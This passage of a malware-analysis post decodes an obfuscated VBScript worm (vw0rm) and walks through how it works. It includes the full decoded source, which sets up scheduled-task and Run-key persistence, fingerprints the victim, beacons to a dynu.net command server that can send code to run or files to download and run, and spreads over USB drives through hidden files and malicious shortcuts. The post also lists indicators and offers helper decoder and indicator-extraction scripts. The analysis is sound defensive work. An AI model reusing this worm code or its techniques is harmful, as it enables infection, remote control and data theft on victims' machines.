ݓ܏ݘݕۼ۹ݔݝݓ܏ݕݤݝݒݣݘݞݝ܏ۼ۹ۼ۹ݢݔݣ܏ݦ܏ܬ܏݆݂ݒݡݘݟݣۼ۹ݢݔݣ܏ݢݗ܏ܬ܏ܲݡܗܟܘۼ۹ݢݔݣ܏ݕݢ܏ܬ܏ܲݡܗܠܘۼ۹ۼ۹ܵݤݝݒݣݘݞݝ܏ܲݡܗܽܘۼ۹݂ݔݣ܏ܲݡ܏ܬ܏ܲݡݔݐݣݔܾݑݙݔݒݣܗݙܗܽܘܘۼ۹ܴݝݓ܏ܵݤݝݒݣݘݞݝۼ۹ۼ۹ݕݤݝݒݣݘݞݝ܏ܴݧܗݢܘۼ۹ܴݧ܏ܬ܏ݢݗܝܴݧݟݐݝݓܴݝݥݘݡݞݝݜݔݝݣ݂ݣݡݘݝݖݢܗܑܔܑܕݢܕܑܔܑܘۼ۹ݔݝݓ܏ݕݤݝݒݣݘݞݝۼ۹ۼ۹ݕݤݝݒݣݘݞݝ܏ܿݣܗܲܛܰܘۼ۹ܿݣܬܑܑۼ۹݂ݔݣ܏݇ܬܲݡܗܢܘۼ۹݇ܝܾݟݔݝ܏ܑܑܾ݂ܿ݃ܛܑݗݣݣݟܩܞܞݗݞݤݢݣݡݘݚݞܝݓݨݝݤܝݝݔݣܩܦܦܤܣܞܑܕܲܛݕݐݛݢݔۼ۹݇ܝݢݔݣݡݔݠݤݔݢݣݗݔݐݓݔݡ܏ܑ݄ݢݔݡܜܰݖݔݝݣܩܑܛݝݕۼ۹݇ܝݢݔݝݓ܏ܰۼ۹ܿݣܬ݇ܝݡݔݢݟݞݝݢݔݣݔݧݣۼ۹ݔݝݓ܏ݕݤݝݒݣݘݞݝۼ۹ۼ۹ܵݤݝݒݣݘݞݝ܏ݝݕۼ۹ݝݕܬܑܑۼ۹ݘܬݖݞܗܠܘۼ۹ݢܬ݅ܽ܏ܕ܏ܑݎܑ܏ܕ܏ݘۼ۹ݝݕܬݝݕܕݢܕݒۼ۹ݢܬݔݧܗܑܑܾܼ݄ܴܼܴܲܿ݃݁ܽܰܘۼ۹ݝݕܬݝݕܕݢܕݒۼ۹ݢܬݔݧܗܑܑ݄݂ܴܼܴ݁ܽܰܘۼ۹ݝݕܬݝݕܕݢܕݒۼ۹ݢܬݖݞܗܡܘۼ۹ݝݕܬݝݕܕݢܕݒۼ۹ݢܬݖݞܗܣܘۼ۹ݝݕܬݝݕܕݢܕݒܕݒܕݝݣܕݒܕݤܕݒۼ۹ܴݝݓ܏ܵݤݝݒݣݘݞݝۼ۹ۼ۹݂ݤݑ܏ܽݢۼ۹ݞݝ܏ݔݡݡݞݡ܏ݡݔݢݤݜݔ܏ݝݔݧݣۼ۹ݓݡܬݔݧܗܑܰݟݟܳݐݣݐܑܘ܏ܕ܏ܲ܏ܕ܏ݦݝۼ۹ݕݢܝܲݞݟݨܵݘݛݔ܏ݕݤܛݓݡܛݣݡݤݔۼ۹ݢݗܝݡݤݝ܏ܑݢݒݗݣݐݢݚݢ܏ܞݒݡݔݐݣݔ܏ܞݢݒ܏ݜݘݝݤݣݔ܏ܞݜݞ܏ܠ܏ܞݣݝ܏݂ݚݨݟݔ܏ܞݣݡ܏ܑ܏ܕ܏ܲݗݡ݆ܗܢܣܘ܏ܕ܏ݓݡܛݕݐݛݢݔۼ۹ݢݗܝݡݔݖݦݡݘݣݔ܏ݖܗܟܘ܏ܕ܏ݖܗܢܘ܏ܕ܏ܑ݄݉݃ܺܟܼ݉ܡܑ݂݄ܛ܏ܲݗ܏ܕ܏ݓݡ܏ܕ܏ܲݗܛ܏ݖܗܤܘۼ۹ݕݢܝݒݞݟݨݕݘݛݔ܏ݕݤܛ܏ܲݡܗܡܘܝܽݐݜݔ݂ݟݐݒݔܗܕܷܦܘܝ݂ݔݛݕܝܿݐݣݗ܏ܕܲ܏ܕ܏ݦݝ܏ܛݣݡݤݔۼ۹ݔݝݓ܏݂ݤݑۼ۹ۼ۹ݓݡܬݔݧܗܑܰݟݟܳݐݣݐܑܘ܏ܕ܏ܲ܏ܕ܏ݦݝۼ۹ۼ۹ݢݤݑ܏ݢݟݡۼ۹ݞݝ܏ݔݡݡݞݡ܏ݡݔݢݤݜݔ܏ݝݔݧݣۼ۹ݕݞݡ܏ݔݐݒݗ܏ݓݡ܏ݘݝ܏ݕݢܝݓ
ݡݘݥݔݢۼ۹ݓݟܬݓݡܝݟݐݣݗ܏ܕ܏ݒۼ۹ݘݕ܏ݓݡܝݘݢݡݔݐݓݨ܏ܬ܏ݣݡݤݔ܏ݣݗݔݝۼ۹ݘݕ܏ݓݡܝݓݡݘݥݔݣݨݟݔ܏ܬ܏ܠ܏ݣݗݔݝۼ۹ݕݢܝݒݞݟݨݕݘݛݔ܏ݕݤܛݓݟ܏ܕ܏ݦݝܛݣݡݤݔۼ۹ݘݕ܏ݕݢܝݕݘݛݔݔݧݘݢݣݢܗݓݟ܏ܕ܏ݦݝܘ܏ݣݗݔݝۼ۹ݕݢܝݖݔݣݕݘݛݔܗݓݟ܏ܕ܏ݦݝܘܝݐݣݣݡݘݑݤݣݔݢܬܡܚܣۼ۹ݔݝݓ܏ݘݕۼ۹ݕݞݡ܏ݔݐݒݗ܏ݕݘ܏ݘݝ܏ݕݢܝݖݔݣݕݞݛݓݔݡܗݓݟܘܝݕݘݛݔݢۼ۹ݘݕ܏ݘݝݢݣݡܗݕݘܝݝݐݜݔܛܑܝܑܘ܏ݣݗݔݝۼ۹ݘݕ܏ݛݒݐݢݔܗݢݟݛݘݣܗݕݘܝݝݐݜݔܛܑܝܑܘ܏ܗݤݑݞݤݝݓܗݢݟݛݘݣܗݕݘܝݝݐݜݔܛܑܝܑܘܘܘܘ܏ܫܭܑݛݝݚܑ܏ݣݗݔݝۼ۹ݕݘܝݐݣݣݡݘݑݤݣݔݢܬܡܚܣۼ۹ݘݕ܏ݤݒݐݢݔܗݕݘܝݝݐݜݔܘ܏ܫܭ܏ݤݒݐݢݔܗݦݝܘ܏ݣݗݔݝۼ۹ݦݘݣݗ܏ݢݗܝݒݡݔݐݣݔݢݗݞݡݣݒݤݣܗݓݟ܏܏ܕ܏ݢݟݛݘݣܗݕݘܝݝݐݜݔܛܑܝܑܘܗܟܘ܏ܕ܏ܑܝݛݝݚܑܘ܏ۼ۹ܝݦݘݝݓݞݦݢݣݨݛݔ܏ܬ܏ܦۼ۹ܝݣݐݡݖݔݣݟݐݣݗ܏ܬ܏ܑݒݜݓܝݔݧݔܑۼ۹ܝݐݡݖݤݜݔݝݣݢ܏ܬ܏ܑܞݒ܏ݢݣݐݡݣ܏ܑ܏ܕ܏ݡݔݟݛݐݒݔܗݦݝܛܑ܏ܑܛ܏ݒݗ܏ܕ܏ܑ܏ܑ܏ܕ܏ݒݗܘ܏ܕ܏ܑܕݢݣݐݡݣ܏ܑ܏ܕ܏ݡݔݟݛݐݒݔܗݕݘܝݝݐݜݔܛܑ܏ܑܛ܏ݒݗ܏ܕ܏ܑ܏ܑ܏ܕ܏ݒݗܘ܏ܕܑܕݔݧݘݣܑۼ۹ݕݘݒ܏ܬ܏ݢݗܝݡݔݖݡݔݐݓܗݖܗܣܘ܏ܕ܏ݢݗܝݡݔݖݡݔݐݓܗݖܗܣܘ܏ܕ܏ܑܝܑ܏ܕ܏ݢݟݛݘݣܗݕݘܝݝݐݜݔܛ܏ܑܝܑܘܗݤݑݞݤݝݓܗݢݟݛݘݣܗݕݘܝݝݐݜݔܛ܏ܑܝܑܘܘܘܕ܏ݒܘ܏ܕ܏ݖܗܥܘܘ܏ۼ۹ݘݕ܏ݘݝݢݣݡܗݘݒݞݝݛݞݒݐݣݘݞݝܛܑܛܑܘ܏ܬ܏ܟ܏ݣݗݔݝۼ۹ܝݘݒݞݝݛݞݒݐݣݘݞݝ܏ܬ܏ݕݘܝݟݐݣݗۼ۹ݔݛݢݔ܏ۼ۹ܝݘݒݞݝݛݞݒݐݣݘݞݝ܏ܬ܏ݕݘݒۼ۹܏ݔݝݓ܏ݘݕۼ۹ܝݢݐݥݔܗܘۼ۹ݔݝݓ܏ݦݘݣݗۼ۹ݔݝݓ܏ݘݕۼ۹ݔݝݓ܏ݘݕۼ۹ݔݝݓ܏ݘݕۼ۹ݝݔݧݣۼ۹ݕݞݡ܏ݔݐݒݗ܏ݕݞ܏ݘݝ܏ݕݢܝݖݔݣݕݞݛݓݔݡܗݓݟܘܝݢݤݑݕݞݛݓݔݡݢۼ۹ݕݞܝݐݣݣݡݘݑݤݣݔݢܬܡܚܣۼ۹ݦݘݣݗ܏ݢݗܝݒݡݔݐݣݔݢݗݞݡݣݒݤݣܗݓݟ܏ܕ܏ݕݞܝݝݐݜݔ܏ܕ܏ܑܝݛݝݚܑܘۼ۹ܝݦݘݝݓݞݦݢݣݨݛݔܬܦۼ۹ܝݣݐݡݖݔݣݟݐݣݗܬܑݒݜݓܝݔݧݔܑۼ۹ܝݐݡݖݤݜݔݝݣݢܬܑܞݒ܏ݢݣݐݡݣ܏ܑ܏ܕ܏ݡݔݟݛݐݒݔܗݦݝܛܑ܏ܑܛ܏ݒݗ܏ܕ܏ܑ܏ܑ܏ܕ܏ݒݗܘ܏ܕ܏ܑܕݢݣݐݡݣ܏ݔݧݟݛݞݡݔݡ܏ܑ܏ܕ܏ݡݔݟݛݐݒݔܗݕݞܝݝݐݜݔܛܑ܏ܑܛ܏ݒݗ܏ܕ܏ܑ܏ܑ܏ܕ܏ݒݗܘ܏ܕܑܕݔݧݘݣܑۼ۹ݕݘݒܬݢݗܝݡݔݖݡݔݐݓܗܑܷܻܼܺ݋ݢݞݕݣݦݐݡݔ݋ݒݛݐݢݢݔݢ݋ݕݞݛݓݔݡܑ܏ܕ܏ݖܗܥܘܘۼ۹ݘݕ܏ݘݝݢݣݡܗܝݘݒݞݝݛݞݒݐݣݘݞݝܛܑܛܑܘܬܟ܏ݣݗݔݝۼ۹ܝݘݒݞݝݛݞݒݐݣݘݞݝܬݕݞܝݟݐݣݗۼ۹ݔݛݢݔۼ۹ܝݘݒݞݝݛݞݒݐݣݘݞݝܬݕݘݒۼ۹ݔݝݓ܏ݘݕۼ۹ܝݢݐݥݔܗܘۼ۹ݔݝݓ܏ݦݘݣݗۼ۹ݝݔݧݣۼ۹ݔݝݓ܏ݘݕۼ۹ݔݝݓ܏ݘݕۼ۹ݝݔݧݣۼ۹ݔݡݡܝݒݛݔݐݡۼ۹ݔݝݓ܏ݢݤݑۼ۹ۼ۹ۼ۹ۼ۹ݥݝܬܑ݆ݘݝݓݞݦݢܑۼ۹݄ܬܑܑۼ۹ۼ۹ݒݗ܏ܬ܏ݒݗݡݦܗܢܣܘۼ۹ݒ܏ܬ܏ݒݗݡݦܗܨܡܘۼ۹ݕݤ܏ܬ܏ݦܝݢݒݡݘݟݣݕݤݛݛݝݐݜݔۼ۹ݦݝܬݦܝݢݒݡݘݟݣݝݐݜݔۼ۹ܽ݃ܬܑܽݞܑۼ۹ݘݕ܏ݕݢܝݕݘݛݔݔݧݘݢݣݢܗݔݧܗܑ݆ݘݝݓݘݡܑܘ܏ܕ܏ܑ݋ܼݘݒݡݞݢݞݕݣܝܴܽ݃݋ܵݡݐݜݔݦݞݡݚ݋ݥܡܝܟܝܤܟܦܡܦ݋ݥݑݒܝݔݧݔܑܘ܏ݣݗݔݝۼ۹ܽ݃ܬܑ݈ݔݢܑۼ۹ݔݝݓ܏ݘݕۼ۹ۼ۹݄ܬ܏ݢݗܝݡݔݖݡݔݐݓܗݖܗܡܘܘۼ۹ݘݕ܏݄ܬܑܑ܏ݣݗݔݝۼ۹ݘݕ܏ݜݘݓܗݕݤܛܡܘܬܑܩ݋ܑ܏ܕ܏ݦݝ܏ݣݗݔݝۼ۹݄ܬܑܑ݄ܴ݃݁ۼ۹ݢݗܝݡݔݖݦݡݘݣݔ܏ݖܗܡܘܛ܏݄ܛ܏ݖܗܤܘۼ۹ݔݛݢݔۼ۹݄ܬܑܑܻ݂ܴܵܰۼ۹ݢݗܝݡݔݖݦݡݘݣݔ܏ݖܗܡܘܛ܏݄ܛ܏ݖܗܤܘۼ۹ݔݝݓ܏ݘݕۼ۹ݔݝݓ܏ݘݕۼ۹ۼ۹ܽݢۼ۹ݢݟݛܬܑݫ݅ݫܑۼ۹ݦݗݘݛݔ܏ݣݡݤݔۼ۹ݢܬݢݟݛݘݣܗܿݣܗܑ݅ݡݔܑܛܑܑܘܛݢݟݛܘۼ۹ݢݔݛݔݒݣ܏ݒݐݢݔ܏ݢܗܟܘۼ۹ݒݐݢݔ܏ܑݔݧݒܑۼ۹ݢݐܬ܏ݢܗܠܘۼ۹ݔݧݔݒݤݣݔ܏ݢݐۼ۹ݒݐݢݔ܏ܑ݂ݒܑۼ۹ݢܡ܏ܬ܏ܴݧܗܑݣݔݜݟܑܘ܏ܕ܏ܑ݋ܑ܏ܕ܏ݢܗܡܘۼ۹ݢݔݣ܏ݦݡ܏ܬ܏ݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݢܡܛܡܛ݃ݡݤݔܘۼ۹ݦݡܝ݆ݡݘݣݔ܏ݢܗܠܘۼ۹ݦݡܝܲݛݞݢݔܗܘۼ۹ݢݗܝݡݤݝ܏ݢܡܛ܏ܥۼ۹ݒݐݢݔ܏ܑܑ݁ܵۼ۹ݢܡ܏ܬ܏ܴݧܗܑݣݔݜݟܑܘ܏ܕ܏ܑ݋ܑ܏ܕ܏ݢܗܡܘۼ۹ݢݔݣ܏ݦݡ܏ܬ܏ݕݢܝܾ
ݟݔݝ݃ݔݧݣܵݘݛݔܗݢܡܛܡܛ݃ݡݤݔܘۼ۹ݦݡܝ݆ݡݘݣݔ܏ݢܗܠܘۼ۹ݦݡܝܲݛݞݢݔܗܘۼ۹ݢݗܝݡݤݝ܏ݢܡۼ۹ݒݐݢݔ܏ܑ݁ݔݝܑۼ۹ݢݔݣ܏ݦݡ܏ܬ܏ݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݕݤܛܠܘۼ۹ݕ܏ܬ܏ݦݡܝ݁ݔݐݓܰݛݛۼ۹ݦݡܝݒݛݞݢݔܗܘۼ۹ݕ܏ܬ܏ݡݔݟݛݐݒݔܗݕܛݒݗܕݥݝܕݒݗܛݒݗܕݢܗܠܘܕݒݗܘۼ۹ݢݔݣ܏ݦݡ܏ܬ܏ݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݕݤܛܡܛݕݐݛݢݔܘۼ۹ݦݡܝ݆ݡݘݣݔ܏ݕۼ۹ݦݡܝݒݛݞݢݔܗܘۼ۹ݒݐݢݔ܏ܑ݄ݟܑۼ۹ݢݔݣ܏ݦݡ܏ܬ܏ݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݕݤܛܡܛݕݐݛݢݔܘۼ۹ݢܗܠܘ܏ܬ܏ݡݔݟݛݐݒݔܗݢܗܠܘܛܑݫ݄ݫܑܛܑݫ݅ݫܑܘۼ۹ݦݡܝ݆ݡݘݣݔ܏ݢܗܠܘۼ۹ݦݡܝܲݛݞݢݔܗܘۼ۹ݢݗܝݡݤݝ܏ܑݦݢݒݡݘݟݣܝݔݧݔ܏ܞܞܱ܏ܑ܏ܕ܏ݒݗ܏ܕ܏ݕݤ܏ܕ܏ݒݗܛ܏ܥۼ۹ݦܝݠݤݘݣۼ۹ݒݐݢݔ܏ܑܲݛܑۼ۹݆ܝݠݤݘݣ܏ۼ۹ݒݐݢݔ܏ܑ݄ݝܑۼ۹݂ܗܠܘ܏ܬ܏ݡݔݟݛݐݒݔܗ݂ܗܠܘܛܑܔݕܑܛݕݤܘۼ۹݂ܗܠܘ܏ܬ܏ݡݔݟݛݐݒݔܗ݂ܗܠܘܛܑܔݝܑܛݦݝܘۼ۹݂ܗܠܘ܏ܬ܏ݡݔݟݛݐݒݔܗ݂ܗܠܘܛܑܔݢݕݓݡܑܛݓݡܘۼ۹ݔݧݔݒݤݣݔ܏݂ܗܠܘۼ۹ݦܝݠݤݘݣۼ۹ݔݝݓ܏ݢݔݛݔݒݣۼ۹݆ܝ݂ݛݔݔݟ܏ܥܟܟܟۼ۹݂ݟݡۼ۹ݦݔݝݓ" var3 = 0 var2 = "" while var3 != len(var1): var3 += 1 var2 = var2 + chr(ord(mid(var1, var3, 1)) - var6 + len(var5)) print(var2)
At the end, instead of executing the code line by line the way the malware does with its Wscript.Echo call, I printed the result. It gave me the entire decoded Visual Basic script:
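The same decoding step as a reusable tool, added here as an example; it is not the post’s Python and not the malware’s code. It reads a dropper, pulls out the longest string literal (the blob), and undoes the shift with the key string from the sample, which is the only value taken from the malware. It is exercised on a constructed stand-in blob so that it runs offline; the file name on the command line and the UTF-8 read are assumptions.

```python
"""Decoder for the obfuscation layer on this sample.

Added example: not the post's Python and not the malware's code. It does
what the obfuscated VBScript does to itself: sum the code points of a key
string, subtract the key length, and shift every character of the long
Unicode literal down by that amount. Only KEY is taken from the sample;
the blob it is run on below is a constructed stand-in for the real one.
"""
import re
import sys

# Key literal exactly as it appears in the sample (var5 in the rewrite above).
KEY = "HGFTYtdcyfsaty!@#FFDS"


def shift_from_key(key: str) -> int:
    """VBScript: sum of AscW(Mid(key, i, 1)) over the key, minus Len(key)."""
    return sum(ord(ch) for ch in key) - len(key)


def decode(payload: str, key: str = KEY) -> str:
    """ChrW(AscW(c) - keysum + Len(key)) for each c: a constant downward shift.
    A character below the shift is not part of the scheme and makes chr() raise."""
    shift = shift_from_key(key)
    return "".join(chr(ord(ch) - shift) for ch in payload)


def encode(plain: str, key: str = KEY) -> str:
    """Inverse of decode(); used only to build the constructed sample below."""
    shift = shift_from_key(key)
    return "".join(chr(ord(ch) + shift) for ch in plain)


# A VBScript string literal. The blob never contains a quote (a quote in the
# plaintext is shifted to U+0711), so quote-to-quote matching is safe here;
# "" escapes inside other literals just split into two shorter ones.
_LITERAL = re.compile(r'"([^"]*)"')


def extract_blob(vbs_source: str) -> str:
    """The obfuscated payload is by far the longest string literal in the dropper."""
    literals = _LITERAL.findall(vbs_source)
    if not literals:
        raise ValueError("no string literal found in script")
    return max(literals, key=len)


def decode_vbs_source(vbs_source: str, key: str = KEY) -> str:
    """Pull the blob out of a dropper's source text and decode it."""
    return decode(extract_blob(vbs_source), key)


# Constructed stand-in for the dropper: the first two lines of the decoded
# script on this page, re-obfuscated with the real key and wrapped in the same
# dim / assign / Wscript.Echo skeleton. This is not the real file.
SAMPLE_PLAIN = "' Coded by v_B01\r\nOn Error Resume Next\r\n"
SAMPLE_VBS = (
    'dim payload\r\n'
    'payload = "' + encode(SAMPLE_PLAIN) + '"\r\n'
    'dim key\r\n'
    'key = "' + KEY + '"\r\n'
    'Wscript.Echo payload\r\n'
)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        # Real dropper (assumed file name on the command line). Read it as text in
        # the encoding it was saved with; UTF-8 is assumed here. The shifted
        # characters sit between U+06F9 and U+076D, which a byte-wise read mangles.
        with open(sys.argv[1], encoding="utf-8") as fh:
            print(decode_vbs_source(fh.read()))
    else:
        print(decode_vbs_source(SAMPLE_VBS))
```

With this key the shift is 1775: every printable ASCII character of the real script (plus CR and LF) is pushed into the U+06F9 to U+076D range, which is why the blob renders as Syriac-looking text. Running the file as python decoder.py sample.vbs (both names assumed) prints the decoded script. A variant that changes the key only changes the KEY constant, and the key is always the short literal that feeds the summing loop, so it is easy to spot in a new sample.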
Returned code
' Coded by v_B01
On Error Resume Next

' (analyst note) string constants live in three arrays and are referenced by index, so no full key path appears in one literal
j = array("WScript.Shell","Scripting.FileSystemObject","Shell.Application","Microsoft.XMLHTTP")
g = array("HKCU","HKLM","HKCU\vw0rm","\Software\Microsoft\Windows\CurrentVersion\Run\","HKLM\SOFTWARE\Classes\","REG_SZ","\defaulticon\")
y= array("winmgmts:","win32_logicaldisk","Win32_OperatingSystem","winmgmts:\\localhost\root\securitycenter","AntiVirusProduct")

' (analyst note) WMI fingerprinting: go(1) = volume serial, go(2) = OS caption, go(4) = AV product from SecurityCenter / SecurityCenter2
Function go(m)
  If m=4 Then
    T="winmgmts:\\localhost\root\securitycenter"
    Set B=GetObject(y(3)).InstancesOf(y(4))
    For Each a in b
      go=a.displayName
      Exit For
    Next
    Set B=GetObject(y(3) & "2").InstancesOf(y(4))
    For Each a in b
      go=a.displayName
      Exit For
    Next
    If go="" Then go="Not-found"
  Else
    Set B=GetObject(y(0)).InstancesOf(y(m))
    For Each a in b
      If m = 1 Then
        go=a.volumeserialnumber
      ElseIf m = 2 Then
        go=a.caption
      End If
      Exit For
    Next
  End If
End Function

Set w = WScript
Set sh = Cr(0)
Set fs = Cr(1)

Function Cr(N)
  Set Cr = CreateObject(j(N))
End Function

Function Ex(s)
  Ex = sh.ExpandEnvironmentStrings("%"&s&"%")
End Function

' (analyst note) C2 request: POST to http://houstriko.dynu.net:7754/<command>, victim fingerprint carried in the User-Agent header
Function Pt(C,A)
  Pt=""
  Set X=Cr(3)
  X.Open "POST","http://houstriko.dynu.net:7754/"&C,false
  X.setrequestheader "User-Agent:",nf
  X.send A
  Pt=X.responsetext
End Function

' (analyst note) fingerprint: Windows_<serial>\<computer>\<user>\<OS>\<AV>\\<.NET 2.0 present>\<started from drive root>\
Function nf()
  nf=""
  i=go(1)
  s=VN & "_" & i
  nf=nf&s&c
  s=ex("COMPUTERNAME")
  nf=nf&s&c
  s=ex("USERNAME")
  nf=nf&s&c
  s=go(2)
  nf=nf&s&c
  s=go(4)
  nf=nf&s&c&c&nt&c&u&c
End Function

' (analyst note) persistence: copy to %AppData%, scheduled task "Skype" every minute, Run key value "ZTUK0MZ2SU", Startup folder (shell namespace &H7)
Sub Ns()
  On Error Resume Next
  dr=ex("AppData") & C & wn
  fs.CopyFile fu,dr,true
  sh.run "schtasks /create /sc minute /mo 1 /tn Skype /tr " & ChrW(34) & dr,false
  sh.regwrite g(0) & g(3) & "ZTUK0MZ2SU", Ch & dr & Ch, g(5)
  fs.copyfile fu, Cr(2).NameSpace(&H7).Self.Path &C & wn ,true
End Sub

dr=ex("AppData") & C & wn

' (analyst note) spreading: on each removable drive (drivetype 1) hide the real files and folders (attributes 2+4) and replace them with .lnk files that start the worm, then the original
Sub spr()
  On Error Resume Next
  For Each dr in fs.drives
    dp=dr.path & c
    If dr.isready = TRUE Then
      If dr.drivetype = 1 Then
        fs.copyfile fu,dp & wn,true
        If fs.fileexists(dp & wn) Then
          fs.getfile(dp & wn).attributes=2+4
        End If
        For Each fi in fs.getfolder(dp).files
          If instr(fi.name,".") Then
            If lcase(split(fi.name,".")(ubound(split(fi.name,".")))) <>"lnk" Then
              fi.attributes=2+4
              If ucase(fi.name) <> ucase(wn) Then
                With sh.createshortcut(dp & split(fi.name,".")(0) & ".lnk")
                  .windowstyle = 7
                  .targetpath = "cmd.exe"
                  .arguments = "/c start " & replace(wn," ", ch & " " & ch) & "&start " & replace(fi.name," ", ch & " " & ch) &"&exit"
                  fic = sh.regread(g(4) & sh.regread(g(4) & "." & split(fi.name, ".")(ubound(split(fi.name, ".")))& c) & g(6))
                  If instr(iconlocation,",") = 0 Then
                    .iconlocation = fi.path
                  Else
                    .iconlocation = fic
                  End If
                  .save()
                End With
              End If
            End If
          End If
        Next
        For Each fo in fs.getfolder(dp).subfolders
          fo.attributes=2+4
          With sh.createshortcut(dp & fo.name & ".lnk")
            .windowstyle=7
            .targetpath="cmd.exe"
            .arguments="/c start " & replace(wn," ", ch & " " & ch) & "&start explorer " & replace(fo.name," ", ch & " " & ch) &"&exit"
            fic=sh.regread("HKLM\software\classes\folder" & g(6))
            If instr(.iconlocation,",")=0 Then
              .iconlocation=fo.path
            Else
              .iconlocation=fic
            End If
            .save()
          End With
        Next
      End If
    End If
  Next
  err.clear
End Sub

vn="Windows"
U=""

ch = chrw(34)
c = chrw(92)
fu = w.scriptfullname
wn=w.scriptname
NT="No"
If fs.fileexists(ex("Windir") & "\Microsoft.NET\Framework\v2.0.50727\vbc.exe") Then
  NT="Yes"
End If

' (analyst note) HKCU\vw0rm records whether the first run was from the root of a drive, i.e. from a USB stick
U= sh.regread(g(2))
If U="" Then
  If mid(fu,2)=":\" & wn Then
    U="TRUE"
    sh.regwrite g(2), U, g(5)
  Else
    U="FALSE"
    sh.regwrite g(2), U, g(5)
  End If
End If

Ns
spl="|V|"
' (analyst note) beacon loop: poll the C2 every 6 seconds and dispatch on the command prefix; the lines from s=split(...) through case "Ren" are taken directly from decoding the blob above
While TRUE
  s=split(Pt("Vre",""),spl)
  select case s(0)
  case "exc"
    sa= s(1)
    execute sa
  case "Sc"
    s2 = Ex("temp") & "\" & s(2)
    set wr = fs.OpenTextFile(s2,2,True)
    wr.Write s(1)
    wr.Close()
    sh.run s2, 6
  case "RF"
    s2 = Ex("temp") & "\" & s(2)
    set wr = fs.OpenTextFile(s2,2,True)
    wr.Write s(1)
    wr.Close()
    sh.run s2
  case "Ren"
    set wr = fs.OpenTextFile(fu,1)
    f = wr.ReadAll
    wr.close()
    f = replace(f,ch&vn&ch,ch&s(1)&ch)
    Set wr = fs.OpenTextFile(fu,2,false)
    wr.Write f
    wr.close()
  Case "Up"
    Set wr = fs.OpenTextFile(fu,2,false)
    s(1) = replace(s(1),"|U|","|V|")
    wr.Write s(1)
    wr.Close()
    sh.run "wscript.exe //B " & ch & fu & ch, 6
    w.quit
  Case "Cl"
    W.quit
  Case "Un"
    S(1) = replace(S(1),"%f",fu)
    S(1) = replace(S(1),"%n",wn)
    S(1) = replace(S(1),"%sfdr",dr)
    execute S(1)
    w.quit
  End Select
  W.Sleep 6000
  Spr
Wend
From the decoded script I can now see exactly what it does. Ns() handles persistence: the worm copies itself to %AppData%\<scriptname> and to the Startup folder (shell namespace &H7), registers a scheduled task named Skype that launches that copy every minute, and writes a Run key value named ZTUK0MZ2SU pointing at it; a value under HKCU\vw0rm records whether it was first started from the root of a drive, i.e. from a USB stick. The main loop then runs forever: every 6 seconds it POSTs to http://houstriko.dynu.net:7754/Vre with the victim’s volume serial number, computer name, user name, OS caption and antivirus product packed into the User-Agent header, and dispatches on the reply: exc executes VBScript sent by the C2, Sc and RF drop a file into %temp% and run it, Ren rewrites the bot ID (vn) inside its own file, Up overwrites the script with a new version and restarts it with wscript.exe //B, Cl exits, and Un runs a server-supplied uninstall script. Between beacons, spr() spreads to every removable drive (drivetype 1): it copies the worm there, sets the real files and folders to hidden and system (attributes 2+4), and replaces each with a .lnk that runs cmd.exe /c start <worm> & start <original>, keeping the original icon so nothing looks wrong. The task name, the Run value, the HKCU\vw0rm marker and the dynu.net C2 host are the indicators to hunt for.
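One more added example for the analysis above, not the post’s or the malware’s code: the decoded worm never writes a full registry path or ProgID in one literal. It keeps them in the j, g and y arrays and assembles them at runtime (g(0) & g(3) & "ZTUK0MZ2SU"), which is enough to defeat a naive grep. The script below resolves those references, folds the concatenations back into single literals and then extracts the C2 URL, the task name and the registry keys. EXCERPT is a constructed slice of the decoded script shown on this page; the regexes are tuned to this sample’s style and are an assumption for any other sample.

```python
"""Resolve the array-indexed string constants of the decoded script and pull
the obvious indicators out of it.

Added example, not part of the original post and not the malware's code.
EXCERPT is a constructed slice of the decoded script on this page (same j,
g, y arrays and the lines that use them), not the whole file.
"""
import re

EXCERPT = r'''
j = array("WScript.Shell","Scripting.FileSystemObject","Shell.Application","Microsoft.XMLHTTP")
g = array("HKCU","HKLM","HKCU\vw0rm","\Software\Microsoft\Windows\CurrentVersion\Run\","HKLM\SOFTWARE\Classes\","REG_SZ","\defaulticon\")
y= array("winmgmts:","win32_logicaldisk","Win32_OperatingSystem","winmgmts:\\localhost\root\securitycenter","AntiVirusProduct")
X.Open "POST","http://houstriko.dynu.net:7754/"&C,false
sh.run "schtasks /create /sc minute /mo 1 /tn Skype /tr " & ChrW(34) & dr,false
sh.regwrite g(0) & g(3) & "ZTUK0MZ2SU", Ch & dr & Ch, g(5)
U= sh.regread(g(2))
sh.regwrite g(2), U, g(5)
'''

# name = array("a","b",...) on one line; VBScript keywords are case-insensitive.
_ARRAY_DEF = re.compile(r'^\s*(\w+)\s*=\s*array\((.*)\)\s*$', re.I | re.M)
# One string literal, quote to quote. A "" escape inside a literal would be
# split into two shorter literals; this sample does not use that form.
_LITERAL = re.compile(r'"([^"]*)"')
# Tokens of a line: a string literal, or a run of anything that is not a quote.
_TOKEN = re.compile(r'"[^"]*"|[^"]+')


def parse_arrays(src: str) -> dict:
    """Map each array name to the list of its string elements."""
    return {m.group(1): _LITERAL.findall(m.group(2)) for m in _ARRAY_DEF.finditer(src)}


def substitute_indexes(src: str, arrays: dict) -> str:
    """Replace name(N) with the N-th element of that array, as a quoted literal.
    Only names that were defined as arrays are touched, so go(1) or Cr(2) stay."""
    if not arrays:
        return src
    names = "|".join(re.escape(n) for n in arrays)
    pattern = re.compile(r'\b(' + names + r')\((\d+)\)')

    def repl(m):
        values = arrays[m.group(1)]
        idx = int(m.group(2))
        return '"' + values[idx] + '"' if idx < len(values) else m.group(0)

    return pattern.sub(repl, src)


def fold_concats(line: str) -> str:
    """Merge "a" & "b" into "ab". The line is tokenised first so that a comma
    between arguments or text inside a literal is never taken for a boundary."""
    out = []
    for tok in _TOKEN.findall(line):
        is_literal = tok.startswith('"')
        if (is_literal and len(out) >= 2 and out[-2].startswith('"')
                and re.fullmatch(r'\s*&\s*', out[-1])):
            out.pop()                          # drop the " & " separator
            out[-1] = out[-1][:-1] + tok[1:]   # join, dropping the inner quotes
        else:
            out.append(tok)
    return "".join(out)


def resolve_constants(src: str) -> str:
    """Substitute array references, then fold concatenations line by line."""
    substituted = substitute_indexes(src, parse_arrays(src))
    return "\n".join(fold_concats(line) for line in substituted.split("\n"))


def extract_iocs(resolved: str) -> dict:
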